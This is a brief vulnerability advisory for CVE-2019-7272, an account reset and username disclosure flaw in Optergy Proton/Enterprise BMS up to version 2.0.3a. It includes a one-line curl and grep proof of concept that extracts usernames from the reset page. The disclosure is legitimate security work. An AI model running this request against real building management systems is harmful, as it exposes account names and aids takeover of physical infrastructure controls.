Optergy BMS Account Reset and Username Disclosure
Affected version <=2.0.3a (Proton and Enterprise)
Discovered by Gjoko 'LiquidWorm' Krstic
CVE: CVE-2019-7272
Advisory: https://applied-risk.com/resources/ar-2019-008
PoC:
curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='